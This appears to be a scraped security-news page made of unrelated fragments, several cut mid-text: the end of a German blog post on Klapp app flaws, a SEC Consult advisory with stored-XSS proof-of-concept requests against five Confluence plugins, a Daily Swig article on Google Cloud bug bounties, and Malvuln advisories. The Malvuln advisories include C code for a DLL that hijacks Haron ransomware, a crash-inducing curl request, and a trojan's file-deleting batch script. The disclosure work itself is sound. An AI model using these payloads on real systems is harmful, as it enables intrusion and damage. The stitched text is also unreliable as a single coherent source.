Soweit modzero bekannt, ist dies keine vorgesehene Funktionalität. Auch hier müssen wir erneut darauf verweisen, dass solche Fehlerklassen üblich sind. Nur weil eine Benutzeroberfläche eine Einschränkung vorsieht, muss diese von der Applikation nicht zwingend umgesetzt worden sein. Eine Einschränkung in der Benutzeroberfläche ersetzt nicht ein striktes Umsetzen eines ordentlichen Benutzer- und Rollenkonzeptes auch im Backend.

Beiläufig sind noch weitere Probleme aufgefallen, welche hier nicht im Detail beschrieben werden, aber auch mit dem Klapp-Team besprochen wurden:

*   Sensible Informationen in lokaler SQLite-Datenbank (iOS)
*   SQLite Datenbank (iOS) in einem Backup vorhanden
*   Fehlendes Zertifikats-Pinning und Jailbreak-Erkennung
*   Keine Möglichkeit den Zugriff auf die App durch Pass Code oder biometrische Merkmale zu beschränken
**Fazit**

Dies soll kein Aufruf zur Verhinderung von Innovation oder Digitalisierung sein, jedoch bitten wir jeden einzelnen Entwickler, Architekt, CEO... JEDEN Involvierten... seine Verantwortung wahrzunehmen und im Zweifelsfall jemanden hinzuzuziehen, der die Sachlage neutral beurteilen kann.

Natürlich kann in diesem Beispiel argumentiert werden, dass die Auswirkungen der Schwachstellen ja überschaubar sind und die Schutzmassnahmen für das Anwendungsgebiet möglicherweise ausreichen. Das Problem einer solchen Argumentation liegt dabei, dass sich die Umgebung, der Funktionsumfang, die Entwicklungsprozesse sowie die Firmen selbst zukünftig wandeln werden. Selbst wenn zum jetzigen Zeitpunkt ein Unternehmen ehrbare Ziele verfolgt oder eine Applikationsschwachstelle nur eine verhältnismässig geringe Auswirkung aufweist, so kann sich dies schon Morgen ändern. Es ist daher wichtig bereits früh in der Projektphase die richtigen Entscheidungen zu treffen und Fehlfunktionen, Schwachstellen und Bedrohungsmodelle als integral wichtigen Bestandteil zu behandeln.

**Zeitlicher Ablauf***   2020-08-18  Einladungsschreiben der Schule erhalten.
*   2020-08-18  Schwachstellen aufgedeckt.
*   2020-08-19  Klapp kontaktiert. Klapp hat sich zurückgemeldet.
*   2020-08-21  Schwachstellen telefonisch an Klapp übermittelt. Schwachstellen akzeptiert.
*   2020-08-24  Rückmeldung von Klapp erhalten, dass die Autorisierungs-Code Schwachstelle behoben wurde

CVE-2020-36533: Knapp daneben ist auch vorbei

A vulnerability, which was classified as problematic, has been found in Server Status. This issue affects some unknown processing of the component HTTP Status/SMTP Status. The manipulation leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.

Nmap Announce Nmap Dev Full Disclosure Security Lists Internet Issues Open Source Dev

**Full Disclosure mailing list archives**

_From_: SEC Consult Vulnerability Lab <research () sec-consult com>  
_Date_: Fri, 9 Oct 2020 10:46:57 +0000  

SEC Consult Vulnerability Lab Security Advisory < 20201008-0 >
=======================================================================
              title: Multiple Cross-Site Scripting Vulnerabilities
           products: PlantUML, Refined Toolkit for Confluence, Linking for Confluence, Countdown Timer, Server Status
vulnerable versions: PlantUML: 6.43, Refined Toolkit for Confluence: 2.2.5, Linking for Confluence: 5.5.3, Countdown 
Timer: 1.7.0, Server Status: 1.2.1
      fixed version: PlantUML: 6.44, Refined Toolkit for Confluence: 2.2.7, Linking for Confluence: 5.5.7, Countdown 
Timer: 1.7.1, Server Status: 1.2.2
             impact: Medium
           homepage: PlantUML: https://marketplace.atlassian.com/apps/41025/plantuml-for-confluence
                     Refined Toolkit for Confluence: 
https://marketplace.atlassian.com/apps/1211136/refined-toolkit-for-confluence
                     Linking for Confluence: https://marketplace.atlassian.com/apps/166/linking-for-confluence
                     Countdown Timer: https://marketplace.atlassian.com/apps/1211116/countdown-timer
                     Server Status: https://marketplace.atlassian.com/apps/1212916/server-status
              found: 2020-08-12
                 by: Daniel Teuchert (Office Bochum), Roman Ferdigg (Office Vienna)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Europe | Asia | North America

                     https://www.sec-consult.com

=======================================================================

Vendor & Product description:
-------------------
PlantUML
"Macros to add various UML diagrams and other diagrams"
Vendor: https://www.avono.de

Refined Toolkit for Confluence
"Improve Confluence Pages with Handy UI Tools"
Vendor: https://www.refined.com

Linking for Confluence
"Enable one-click links to access Confluence templates, aggregate resources, and create structured content"
Vendor: https://www.servicerocket.com

Countdown Timer
"Countdown widget for Confluence"
Vendor: www.akeles.com

Server Status
"A collection of some server status tools for confluence"
Vendor: https://aptis-solutions.com

Business recommendation:
------------------------
Update to the latest versions of the plugins. An in-depth security
analysis performed by security professionals is highly advised, as the
plugins may be affected from further security issues.


Vulnerability overview/description:
-----------------------------------
1) PlantUML - Stored Cross-Site Scripting
The Database Information macro is a component of PlantUML and can be used to
inject JavaScript code into Confluence pages, leading to a stored cross-site
scripting vulnerability.

2) Refined Toolkit for Confluence - Stored Cross-Site Scripting
The elements UI-Image and UI-Button can be used to inject JavaScript code into
Confluence pages, leading to a stored cross-site scripting vulnerability.

3) Linking for Confluence - Stored Cross-Site Scripting
The Link in New Windows macro can be used to inject JavaScript code into
Confluence pages, leading to a stored cross-site scripting vulnerability.

4) Countdown Timer - Stored Cross-Site Scripting
The Countdown Timer macro can be used to inject JavaScript code into Confluence
pages, leading to a stored cross-site scripting vulnerability.

5) Server Status - Stored Cross-Site Scripting
The two macros HTTP Status and SMTP Status can be used to inject JavaScript code
into Confluence pages, leading to a stored cross site scripting vulnerability.


Proof of concept:
-----------------
1) PlantUML - Stored Cross-Site Scripting
In the component Database Information a data source can be configured through
the parameter "datasources". This parameter allows an attacker to inject a
JavaScript code. The code is executed when a user visits the page where the
macro is used.

Below is the example on how the XSS issue can be exploited:

POST /rest/tinymce/1/macro/placeholder HTTP/1.1
Host: confluence:8090
\[...\]
Referer: 
http://confluence:8090/pages/resumedraft.action?draftId=65623&draftShareId=ebaa1df3-0bb2-476f-9e83-560e87bdd9a5&;

{"contentId":"65622","macro":{"name":"database-info","params":{"datasources":"<script>alert(document.domain)</script>","attributes":"sdfdsf"},"body":""}}

2) Refined Toolkit for Confluence - Stored Cross-Site Scripting
In the two components UI-Image and UI-Button the parameter "url" allows an
attacker to inject a JavaScript code. This code is executed when a user
clicks on the created image/button on the Confluence page.

The following request demonstrates the creation of such an UI-Image macro:

POST /rest/tinymce/1/macro/placeholder HTTP/1.1
Host: confluence:8090
\[...\]
Referer: 
http://confluence:8090/pages/resumedraft.action?draftId=65609&draftShareId=d0b7c806-ec40-4f56-8bdf-bd19474e8073&;

{"contentId":"65603","macro":{"name":"ui-image","params":{"imageUrl":"test","linkUrl":"javascript:alert(document.domain)"},"body":""}}

3) Linking for Confluence - Stored Cross-Site Scripting
The parameter "href" in the Link in New Window macro allows an attacker to
inject a JavaScript code. This code is executed when a user clicks on the
created Link on the Confluence page.

The following request demonstrates the creation of such a link:

POST /rest/tinymce/1/macro/placeholder HTTP/1.1
Host: confluence:8090
\[...\]
Referer: 
http://confluence:8090/pages/resumedraft.action?draftId=65609&draftShareId=d0b7c806-ec40-4f56-8bdf-bd19474e8073&;

{"contentId":"65603","macro":{"name":"link-window","params":{"href":"javascript:alert(document.domain)","linkText":"click
 here"},"body":""}}

4) Countdown Timer - Stored Cross-Site Scripting
In the Countdown Timer plugin it is possible to set a countdown date through
the parameter "countdowndate". This parameter allows an attacker to inject
a JavaScript code. The code is executed when a user visits the page where
the plugin is used.

Below is the example on how the XSS issue can be exploited:

POST /rest/tinymce/1/macro/placeholder HTTP/1.1
Host: confluence:8090
\[...\]
Referer: 
http://confluence:8090/pages/resumedraft.action?draftId=65627&draftShareId=de758257-a056-479e-9e6a-eccdede26003&;

{"contentId":"65626","macro":{"name":"countdown","params":{"countdowndate":"<script>alert(document.domain)</script>"},"body":""}}

5) Server Status - Stored Cross-Site Scripting
In the two components HTTP Status and SMTP status it is possible to set a text
through the parameter "displayText". This parameter allows an attacker to
inject a JavaScript code. The code is executed when a user visits the page
where the plugin is used.

Below is the example on how the XSS issue can be exploited:

POST /rest/tinymce/1/macro/placeholder HTTP/1.1
Host: confluence:8090
\[...\]
Referer: 
http://confluence:8090/pages/resumedraft.action?draftId=65619&draftShareId=efc17088-e2b6-4c29-9f0b-8ee90b4c03b7&;

{"contentId":"65618","macro":{"name":"server-status-http-request","params":{"url":"http://test.com","displayText":";<script>alert(document.domain)</script>","theme":"Color"},"body":""}}


Vulnerable / tested versions:
-----------------------------
The following versions of the plugins have been tested, which were the latest
versions available at the time of the test.

PlantUML was tested in version 6.43.
Refined Toolkit for Confluence was tested in version 2.2.5.
Linking for Confluence was tested in version 5.5.3.
Countdown Timer was tested in version 1.7.0.
Server Status was tested in version 1.2.1.

It is assumed earlier versions of the plugins are also vulnerable to the issues.


Vendor contact timeline:
------------------------
PlantUML
2020-08-19: Contacting avono AG (PlantUML) through info () avono de
2020-08-21: Vendor supplies PGP key for security contact
2020-08-21: Sending the details of the vulnerability
2020-08-25: Vendor releases fixed version 6.44
2020-10-08: Public release of the security advisory

Refined Toolkit for Confluence
2020-08-19: Contacting vendor through support () refined com
2020-08-19: Vendor automatically creates Jira Ticket
2020-08-24: Vendor asks for information about the vulnerability via Jira
2020-08-24: Sending the details of the vulnerability
2020-08-26: Vendor releases fixed version 2.2.7
2020-10-08: Public release of the security advisory

Linking for Confluence
2020-08-19: Contacting vendor through apps.support () servicerocket com
2020-08-19: Vendor automatically creates Jira Ticket
2020-08-19: Vendor supplies PGP key for security contact
2020-08-20: Sending the details of the vulnerability
2020-09-20: Vendor releases fixed version 5.5.7
2020-10-08: Public release of the security advisory

Countdown Timer
2020-08-19: Contacting Akeles Consulting (Countdown Timer) through help () akeles com
2020-08-21: Vendor creates Jira Ticket and asks for information about the vulnerability via Jira
2020-08-21: Sending the details of the vulnerability
2020-09-17: Requesting a status update
2020-09-17: Vendor is working on it and there will be soon a new version
2020-09-22: Vendor was reminded about the latest possible release date
2020-09-28: Vendor will probably release the advisory in CW 40
2020-10-05: Requesting a status update
2020-10-06: Vendor releases fixed version 1.7.1
2020-10-08: Public release of the security advisory

Server Status
2020-08-19: Contacting APTIS GmbH (Server Status) through info@aptis.support
2020-08-31: Sending unencrypted advisory as requested by vendor
2020-08-31: Vendor releases fixed version 1.2.2
2020-10-08: Public release of the security advisory


Solution:
---------
PlantUML
The fixed version 6.44 is available at the Marketplace:
https://marketplace.atlassian.com/apps/41025/plantuml-for-confluence?hosting=server&tab=versions

Refined Toolkit for Confluence
The fixed version 2.2.7 is available at the Marketplace:
https://marketplace.atlassian.com/apps/1211136/refined-toolkit-for-confluence?hosting=datacenter&tab=versions

Linking for Confluence
The fixed version 5.5.7 is available at the Marketplace:
https://marketplace.atlassian.com/apps/166/linking-for-confluence?hosting=cloud&tab=versions

Countdown Timer
The fixed version 1.7.1 is available at the Marketplace:
https://marketplace.atlassian.com/apps/1211116/countdown-timer?hosting=server&tab=versions

Server Status
The fixed version 1.2.2 is available at the Marketplace:
https://marketplace.atlassian.com/apps/1212916/server-status?hosting=server&tab=versions

Workaround:
-----------
None


Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec\_consult

EOF D. Teuchert, R. Ferdigg / @2020

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

**Current thread:**

*   **SEC Consult SA-20201008-0 :: Multiple Cross-Site Scripting Vulnerabilities in Confluence Marketplace Plugins** _SEC Consult Vulnerability Lab (Oct 09)_

CVE-2020-36527: Multiple Cross-Site Scripting Vulnerabilities in Confluence Marketplace Plugins

More than $300,000 was handed out in GCP prize money during 2021

More than $300,000 was handed out in GCP prize money during 2021

Ethical hackers have earned more than $300,000 after uncovering a variety of flaws in Google Cloud Platform (GCP).

The top seven responsibly disclosed vulnerabilities that qualified under GCP’s Vulnerability Rewards Program (VRP) last year scooped a total of $313,337, with the winner taking away $133,337.

Google said the GCP VRP – which began in 2019 – shows that many talented security researchers are getting involved in improving cloud security by uncovering vulnerabilities that might have otherwise gone undetected.

The amount awarded represents a sizeable fraction of the $8.7 million awarded by Google across its complete range of vulnerability disclosure programs.

**I’m IAP, hope you’re API too**

The first prize, and an award of $133,337, went to security researcher Sebastian Lutz for discovering a bug in in Identity-Aware Proxy (IAP) that offered a way for an attacker to access IAP-protected resources.

The flaw meant that if an attacker tricked a prospective victim into visiting a URL that was under their control, they would be able to steal their IAP authentication token, as explained in greater depth in a technical blog post.

**Does not compute**

Hungarian researcher Imre Rad earned a second prize of $73,331 after uncovering a mechanism to take over a Google Compute Engine virtual machine.

The hack relied on sending malicious Dynamic Host Configuration Protocol (DHCP) packets to the virtual machine in order to spoof the Google Compute Engine metadata server.

RELATED Vast majority of ethical hackers keen to spend more time bug bounty hunting – report

As explained in a technical write-up by Rad on Github, the flaw and associated attacks were first reported to Google in September 2020.

A protracted disclosure process followed, and its was only after Rad went public with his findings in June 2021 that Google fixed the issue a month later.

**Going with the dataflow**

Third spot in the 2021 edition of the GCP VRP stakes – along with a prize of $73,331 – went to security researcher Mike Brancato for the discovery and disclosure of a remote code execution (RCE) vulnerability in Google Cloud Dataflow.

Brancato discovered that Dataflow nodes were exposing an unauthenticated Java JMX port, a security weakness that made it possible to run arbitrary commends on the virtual machine, as explained in a technical blog post.

The impact of the vulnerability depends on which service account is assigned to Dataflow worker nodes, Brancato told The Daily Swig.

The researcher explained: “By default that is the Google Compute Engine default service account, which has the project-wide Editor role assigned. The Editor role has a lot of permissions to create and destroy resources - it is part of the ‘basic roles’ that Google doesn’t recommend using because they provide broad permissions.”

Read more of the latest cloud security news

They added: “The vulnerability is easily exploitable with existing tools like Metasploit,” provided an attacker identifies an open firewall port that exposed a vulnerable system to potential attack.

The security researcher has been working in cloud security since 2017 and bug bounty hunting has become a natural extension to their regular work.

“As part of my exposure to cloud APIs and my background, I started to identify systems that appear interesting and may be vulnerable to attack,” Brancato concluded.

The Daily Swig also invited Lutz and Rad to comment on their respective research, as well as asking Google how it would like to improve cloud-focused elements of its bug bounty program.

RECOMMENDED HTTP/3 evolves into RFC 9114 – a security advantage, but not without challenges

Google showers top cloud security researchers with kudos and cash

Haron ransomware looks for and executes DLLs in its current directory. Therefore, we can potentially hijack a DLL to execute our own code and control and terminate the malware pre-encryption. The exploit DLL will check if the current directory is "C:\Windows\System32" and if not we grab our process ID and terminate. We do not need to rely on hash signatures or third-party products as the malware's own flaw will do the work for us. Endpoint protection systems and or antivirus can potentially be killed prior to executing malware, but this method cannot as there's nothing to kill the DLL that just lives on disk waiting. From a defensive perspective you can add the DLLs to a specific network share containing important data as a layered approach. All basic tests were conducted successfully in a virtual machine environment.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/dedad693898bba0e4964e6c9a749d380.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Ransom.HaronVulnerability: Code ExecutionDescription: Haron looks for and executes DLLs in its current directory. Therefore, we can potentially hijack a vuln DLL execute our own code, control and terminate the malware pre-encryption. The exploit dll will check if the current directory is "C:\Windows\System32", if not we grab our process ID and terminate. We do not need to rely on hash signature or third-party product, the malwares own flaw will do the work for us. Endpoint protection systems and or antivirus can potentially be killed prior to executing malware, but this method cannot as theres nothing to kill the DLL just lives on disk waiting. From defensive perspective you can add the DLLs to a specific network share containing important data as a layered approach. All basic tests were conducted successfully in a virtual machine environment.Family: HaronType: PE32MD5: dedad693898bba0e4964e6c9a749d380Vuln ID: MVID-2022-0609Disclosure: 06/06/2022 Exploit/PoC:1) Compile the following C code as "VERSION.dll"2) Place the DLL in same directory as the ransomware3) Optional - Hide it: attrib +s +h "VERSION.dll"4) Run the malware#include "windows.h"//By malvuln//Purpose: Exploit Haron/** DISCLAIMER:Author is NOT responsible for any damages whatsoever by using this software or improper malwarehandling. By using this code you assume and accept all risk implied or otherwise.**///gcc -c VERSION.c -m32//gcc -shared -o VERSION.dll VERSION.o -m32BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){  switch (reason) {  case DLL_PROCESS_ATTACH:   MessageBox(NULL, "Haron\nPWNED By MALVULN", "Code Exec PoC", MB_OK);   TCHAR buf[MAX_PATH];   GetCurrentDirectory(MAX_PATH, TEXT(buf));   int rc = strcmp("C:\\Windows\\System32", TEXT(buf));     if(rc != 0){     HANDLE handle = OpenProcess(PROCESS_TERMINATE, FALSE, getpid());     if (NULL != handle) {           TerminateProcess(handle, 0);       CloseHandle(handle);     }   }    break;  }  return TRUE;}Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Ransom.Haron MVID-2022-0609 Code Execution

Trojan-Proxy.Win32.Symbab.o malware suffers from a heap corruption vulnerability.

Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022  
Original source: https://malvuln.com/advisory/bffc519fbaf2d119bd307cd22368cdc7.txt  
Contact: malvuln13@gmail.com  
Media: twitter.com/malvuln

Threat: Trojan-Proxy.Win32.Symbab.o  
Vulnerability: Heap Corruption  
Description: The malware listens on TCP port 8080. Attackers who can reach an infected system can send a corrupt HTTP request for the "redirecturl" parameter causing a heap corruption.  
Family: Symbab  
Type: PE32  
MD5: bffc519fbaf2d119bd307cd22368cdc7  
Vuln ID: MVID-2022-0610  
Disclosure: 06/06/2022

Memory Dump:  
(670.1e5c): Access violation - code c0000005 (first/second chance not available)  
eax=00000000 ebx=00000000 ecx=049fff48 edx=00000290 esi=00000003 edi=00000003  
eip=7770ed3c esp=049fb564 ebp=049fb6f4 iopl=0         nv up ei pl nz na po nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202  
ntdll!ZwWaitForMultipleObjects+0xc:  
7770ed3c c21400          ret     14h

0:007> .ecxr  
eax=00000290 ebx=000002d8 ecx=049fff48 edx=00000290 esi=00450000 edi=00000000  
eip=776df2e1 esp=049fbea0 ebp=049fbee0 iopl=0         nv up ei pl zr na pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246  
ntdll!RtlFreeHeap+0xa1:  
776df2e1 8078ff05        cmp     byte ptr [eax-1],5         ds:002b:0000028f=??

0:007> !analyze -v  
*******************************************************************************  
*                                                                             *  
*                        Exception Analysis                                   *  
*                                                                             *  
*******************************************************************************

*** WARNING: Unable to verify checksum for Trojan-Proxy.Win32.Symbab.o.bffc519fbaf2d119bd307cd22368cdc7.e  
*** ERROR: Module load completed but symbols could not be loaded for Trojan-Proxy.Win32.Symbab.o.bffc519fbaf2d119bd307cd22368cdc7.e

FAULTING_IP:   
ntdll!RtlFreeHeap+a1  
776df2e1 8078ff05        cmp     byte ptr [eax-1],5

EXCEPTION_RECORD:  ffffffff -- (.exr 0xffffffffffffffff)  
ExceptionAddress: 776df2e1 (ntdll!RtlFreeHeap+0x000000a1)  
   ExceptionCode: c0000005 (Access violation)  
  ExceptionFlags: 00000000  
NumberParameters: 2  
   Parameter[0]: 00000000  
   Parameter[1]: 0000028f  
Attempt to read from address 0000028f

PROCESS_NAME:  Trojan-Proxy.Win32.Symbab.o.bffc519fbaf2d119bd307cd22368cdc7.e

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_PARAMETER1:  00000000

EXCEPTION_PARAMETER2:  0000028f

READ_ADDRESS:  0000028f 

FOLLOWUP_IP:   
Trojan_Proxy_Win32_Symbab_o_bffc519fbaf2d119bd307cd22368cdc7+260c  
004a260c 83c404          add     esp,4

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG:  0

APPLICATION_VERIFIER_FLAGS:  0

FAULTING_THREAD:  00001e5c

BUGCHECK_STR:  APPLICATION_FAULT_ACTIONABLE_HEAP_CORRUPTION_heap_failure_invalid_argument_NULL_CLASS_PTR_DEREFERENCE_INVALID_POINTER_READ

PRIMARY_PROBLEM_CLASS:  ACTIONABLE_HEAP_CORRUPTION_heap_failure_invalid_argument

DEFAULT_BUCKET_ID:  ACTIONABLE_HEAP_CORRUPTION_heap_failure_invalid_argument

LAST_CONTROL_TRANSFER:  from 744d7065 to 776df2e1

STACK_TEXT:    
049fbee0 744d7065 00450000 00000000 00000290 ntdll!RtlFreeHeap+0xa1  
049fbf2c 004a260c 00000290 049fff68 004a434a msvcrt!free+0x65  
WARNING: Stack unwind information not available. Following frames may be wrong.  
049fbf38 004a434a 049fff48 50545448 312e312f Trojan_Proxy_Win32_Symbab_o_bffc519fbaf2d119bd307cd22368cdc7+0x260c  
049fff68 004a43d7 00000290 00000290 00000004 Trojan_Proxy_Win32_Symbab_o_bffc519fbaf2d119bd307cd22368cdc7+0x434a  
049fff80 77408654 000002d8 77408630 42500cba Trojan_Proxy_Win32_Symbab_o_bffc519fbaf2d119bd307cd22368cdc7+0x43d7  
049fff94 77704a77 000002d8 37e18a47 00000000 kernel32!BaseThreadInitThunk+0x24  
049fffdc 77704a47 ffffffff 77729eca 00000000 ntdll!__RtlUserThreadStart+0x2f  
049fffec 00000000 004a438c 000002d8 00000000 ntdll!_RtlUserThreadStart+0x1b

STACK_COMMAND:  !heap ; ~7s; .ecxr ; kb

SYMBOL_STACK_INDEX:  2

SYMBOL_NAME:  Trojan_Proxy_Win32_Symbab_o_bffc519fbaf2d119bd307cd22368cdc7+260c

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: Trojan_Proxy_Win32_Symbab_o_bffc519fbaf2d119bd307cd22368cdc7

IMAGE_NAME:  Trojan-Proxy.Win32.Symbab.o.bffc519fbaf2d119bd307cd22368cdc7.e

DEBUG_FLR_IMAGE_TIMESTAMP:  4168069f

FAILURE_BUCKET_ID:  ACTIONABLE_HEAP_CORRUPTION_heap_failure_invalid_argument_c0000005_Trojan-Proxy.Win32.Symbab.o.bffc519fbaf2d119bd307cd22368cdc7.e!Unknown

BUCKET_ID:  APPLICATION_FAULT_ACTIONABLE_HEAP_CORRUPTION_heap_failure_invalid_argument_NULL_CLASS_PTR_DEREFERENCE_INVALID_POINTER_READ_Trojan_Proxy_Win32_Symbab_o_bffc519fbaf2d119bd307cd22368cdc7+260c

Followup: MachineOwner

Exploit/PoC:  
curl "http://192.168.18.125:8080/?redirecturl=http://0x41414141" -v

Connected to 192.168.18.125 (192.168.18.125) port 8080 (#0)  
GET /?redirecturl=http://0x41414141 HTTP/1.1  
Host: 192.168.18.125:8080  
User-Agent: curl/7.47.1  
Accept: */*

HTTP 1.0, assume close after body  
HTTP/1.0 400 Bad Request  
Server: ProxyServer/0.0.1  
Mime-Version: 1.0  
Date: Thu, 01 Jan 1970 00:00:00 GMT  
Content-Type: text/html  
Content-Length: 24  
Expires: Thu, 01 Jan 1970 00:00:00 GMT  
X-Squid-Error: ERR_INVALID_URL 0  
X-Cache: MISS from www.rambler.ru  
Connection: close

Unsupported protocol

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Trojan-Proxy.Win32.Symbab.o MVID-2022-0610 Heap Corruption

Trojan-Banker.Win32.Banbra.cyt malware suffers from an insecure permissions vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/e0f2bee25dd103d92e91e895e313ec34.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Trojan-Banker.Win32.Banbra.cytVulnerability: Insecure Permissions Description: The malware writes a batch script ".bat" file to c drive granting change (C) permissions to the authenticated user group. Standard users can rename the executable dropped by the malware to disable it or replace it with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges. Family: BanbraType: PE32MD5: e0f2bee25dd103d92e91e895e313ec34Vuln ID: MVID-2022-0611Disclosure: 06/06/2022Exploit/PoC:C:\>cacls autoexec.batC:\autoexec.bat BUILTIN\Administrators:(ID)F                NT AUTHORITY\SYSTEM:(ID)F                BUILTIN\Users:(ID)R                NT AUTHORITY\Authenticated Users:(ID)CC:\>type autoexec.bat@echo offSET princix=delSET pasta1=c:\windows\downlo~1\gb*.*SET pasta2=c:\windows\downlo~1\*.g??SET pasta3=c:\windows\downlo~1\g*.*SET pasta4=c:\arquiv~1\GbPlugin\g*.*SET pasta5=c:\arquiv~1\GbPlugin\b*.*SET pasta6=c:\arquiv~1\GbPlugin\c*.*SET pasta55=c:\arquiv~1\GbPlugin\u*.*SET pasta7=c:\windows\downlo~1\Ab*.*SET pasta8=c:\windows\downlo~1\b*.*SET pasta9=c:\windows\downlo~1\Ab*.*SET pasta10=c:\progra~1\GbPlugin\g*.*SET pasta11=c:\progra~1\GbPlugin\b*.*SET pasta12=c:\progra~1\GbPlugin\c*.*SET pasta56=c:\progra~1\GbPlugin\u*.*SET pasta13=C:\progra~1\Scpad\s*.*SET pasta14=c:\arquiv~1\Scpad\s*.*SET pasta15=C:\WINDOWS\system32\scpsssh*.*%princix% %pasta1%%princix% %pasta2%%princix% %pasta3%%princix% %pasta4%%princix% %pasta5%%princix% %pasta6%%princix% %pasta7%%princix% %pasta8%%princix% %pasta9%%princix% %pasta10%%princix% %pasta11%%princix% %pasta12%%princix% %pasta13%%princix% %pasta14%%princix% %pasta15%%princix% %pasta55%%princix% %pasta56%C:\>C:\>dir autoexec.bat Volume in drive C has no label. Directory of C:\05/24/2022  02:26 AM             1,028 autoexec.bat               1 File(s)          1,028 bytes               0 Dir(s)  24,498,929,664 bytes freeDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Trojan-Banker.Win32.Banbra.cyt MVID-2022-0611 Insecure Permissions

Trojan-Banker.Win32.Banker.agzg malware suffers from an insecure permissions vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source:https://malvuln.com/advisory/ef1e59148c9a902ae5454760aaab73fe.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Trojan-Banker.Win32.Banker.agzgVulnerability: Insecure PermissionsDescription: The malware writes a PE file to c drive granting change (C)permissions to the authenticated user group. Standard users can rename theexecutable dropped by the malware to disable it or replace it with theirown executable. Then wait for a privileged user to logon to the infectedmachine to potentially escalate privileges.Family: BankerType: PE32MD5: ef1e59148c9a902ae5454760aaab73feVuln ID: MVID-2022-0608Disclosure: 06/06/2022Exploit/PoC:C:\>cacls tuto.exeC:\tuto.exe BUILTIN\Administrators:(ID)F            NT AUTHORITY\SYSTEM:(ID)F            BUILTIN\Users:(ID)R            NT AUTHORITY\Authenticated Users:(ID)CC:\>dir tuto.exe Volume in drive C has no label. Directory of C:\05/04/2022  02:56 AM            14,336 tuto.exe               1 File(s)         14,336 bytesDisclaimer: The information contained within this advisory is supplied"as-is" with no warranties or guarantees of fitness of use or otherwise.Permission is hereby granted for the redistribution of this advisory,provided that it is not altered except by reformatting it, and that duecredit is given. Permission is explicitly given for insertion invulnerability databases and similar, provided that due credit is given tothe author. The author is not responsible for any misuse of the informationcontained herein and accepts no responsibility for any damage caused by 